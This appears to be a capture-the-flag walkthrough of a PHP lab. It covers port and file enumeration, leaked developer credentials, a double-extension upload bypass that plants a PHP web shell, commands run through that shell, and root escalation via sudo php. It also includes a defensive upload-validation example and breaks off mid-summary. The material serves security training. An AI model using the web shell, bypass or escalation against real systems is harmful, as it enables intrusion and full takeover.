A PHP web application handles file operations and uploads with insufficient security controls. Through careful analysis of file inclusion mechanisms and upload restrictions, skilled attackers can transform seemingly harmless functionality into powerful attack vectors. 🎯 Time to demonstrate file exploitation techniques!
Begin with port scanning to identify running services:
# Port scan reveals HTTP services and SSH
nmap -Pn -sC -sV -p- <target-ip>
# Expected services:
# 22/tcp - SSH
# 80/tcp - HTTP (Status Page)
# 8080/tcp - HTTP (Main PHP Application)
Port 80 shows a status page, port 8080 hosts the main HTTP application, and SSH is available on port 22.
Explore the web application and perform file enumeration:
# Visit the main application
curl http://<target-ip>:8080
# Perform file enumeration using SecLists raft wordlist
# Note: The application returns 200 for non-existent URLs, so exclude common response length
gobuster dir -u http://<target-ip>:8080 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --exclude-length 2664
# Alternative with common wordlists:
dirsearch -u http://<target-ip>:8080 -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://<target-ip>:8080/FUZZ -fs 2664
File enumeration reveals the notes.txt file containing developer notes.
Access the discovered notes file to find development information:
# Read the developer notes
curl http://<target-ip>:8080/notes.txt
# Contents reveal:
# Dev Notes:
# - Remove /upload_log_temp4.php before prod
# - Database creds: root:Password123! (change before going live)
# - Fix contact form
# - Disable debug
# - Check Apache conf
The notes.txt file reveals the existence of the /upload_log_temp4.php endpoint, which should have been removed before production.
Access the development endpoint discovered in the notes and analyze its file upload functionality:
# Access the developer portal mentioned in notes
curl http://<target-ip>:8080/upload_log_temp4.php
# The endpoint shows a "Developer Portal" page with a file upload feature
# Only .txt files are allowed for upload
The upload_log_temp4.php endpoint contains a developer portal whose upload feature only allows .txt file extensions, requiring a bypass technique.
Bypass file upload restrictions using double extension technique:
# Create PHP web shell
cat > shell.txt.php << 'EOF'
<?php system($_GET['cmd']); ?>
EOF
# Upload the web shell using double extension bypass
curl -X POST -F "file=@shell.txt.php" http://<target-ip>:8080/upload_log_temp4.php
# The uploaded webshell has extension: .txt.php
The bypass uses .txt.php extension to circumvent the .txt-only restriction while maintaining PHP execution capability.
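As an added example (not the lab's own code), the weak-versus-hardened upload validation side by side in PHP: the weak check is an assumption about how the lab accepts shell.txt.php, and the storage path /var/app-data/uploads is assumed as well.

```php
<?php
// Added example (not the lab's code): why a naive ".txt" check admits "shell.txt.php",
// beside a hardened validator for the same upload form. The weak check below is an
// assumption about the lab's bug; the storage path /var/app-data/uploads is assumed too.

// Weak check: passes any name that merely CONTAINS ".txt", so "shell.txt.php" is accepted.
function weakAllows(string $name): bool {
    return strpos($name, '.txt') !== false;
}

// Hardened check: only the LAST extension counts, it must match a strict allowlist,
// the bytes must look like plain text, and the stored name is generated server-side.
function hardenedDestination(string $originalName, string $tmpPath): ?string {
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if ($ext !== 'txt') {
        return null;                                   // "shell.txt.php" -> last extension "php"
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== 'text/plain') {
        return null;                                   // a file starting with "<?php" is text/x-php
    }
    // Server-chosen random name, stored outside DocumentRoot so nothing there is ever executed.
    // The real handler would then call move_uploaded_file($tmpPath, $dest).
    return '/var/app-data/uploads/' . bin2hex(random_bytes(16)) . '.txt';
}

// Constructed sample uploads written to temp files so the demo runs offline.
$samples = [
    'notes.txt'     => "dev notes\n",
    'shell.txt.php' => "<?php echo 'hi'; ?>\n",
    'plain.php'     => "<?php echo 'hi'; ?>\n",
];
foreach ($samples as $name => $body) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $body);
    printf("%-14s weak=%-5s hardened=%s\n", $name,
        weakAllows($name) ? 'ALLOW' : 'deny',
        hardenedDestination($name, $tmp) !== null ? 'ALLOW' : 'deny');
    unlink($tmp);
}
```

Run with `php upload_check.php`; pair the hardened validator with web-server configuration that disables script execution under the upload directory, so a bypass of the name check still cannot yield code execution.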
Locate and access the uploaded web shell:
# Find uploaded files in default upload directory
curl http://<target-ip>:8080/uploads/
# Execute commands through the web shell
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=id"
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=whoami"
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=ls%20-la%20/home"
Uploaded files are stored in /uploads directory, and commands are executed using the ?cmd parameter.
Use the web shell to enumerate the system and locate flags:
# Enumerate home directories
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=ls%20-la%20/home/ctf"
# Find and read the user flag
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=cat%20/home/ctf/flag-user.txt"
# Discover additional files
curl "http://<target-ip>:8080/uploads/shell.txt.php?cmd=cat%20/home/ctf/dev_notes.txt"
The user flag is stored in /home/ctf, and dev_notes.txt contains a possible password for SSH access.
Use the password found in dev_notes.txt to gain SSH access:
# SSH login as ctf user
ssh ctf@<target-ip>
# Password from dev_notes.txt file
# Verify access and read user flag directly
cat /home/ctf/flag-user.txt
The ctf user can be accessed via SSH using the password discovered in the dev_notes.txt file.
Enumerate sudo privileges to identify escalation opportunities:
# Check sudo privileges
sudo -l
# Reveals user can run 3 binaries as sudo:
# /bin/ls, /usr/bin/file, /usr/bin/php
# In alphabetical order: file,ls,php
The sudo -l command reveals that the ctf user can run 3 binaries with sudo privileges: file,ls,php.
Exploit PHP sudo privileges to gain root access:
# Use PHP for privilege escalation
sudo php -r "system('/bin/sh');"
# Alternative command execution
sudo php -r "system('whoami');"
sudo php -r "system('id');"
# Retrieve root flag
cat /root/flag-root.txt
PHP can be used for privilege escalation, and the privilege escalation command is sudo php -r "system('/bin/sh');".
With root access, locate and retrieve the root flag:
# Root flag is located at /root/flag-root.txt
find / -name "flag-root.txt" 2>/dev/null
cat /root/flag-root.txt
The root flag is located in /root/flag-root.txt.
The complete attack chain involves: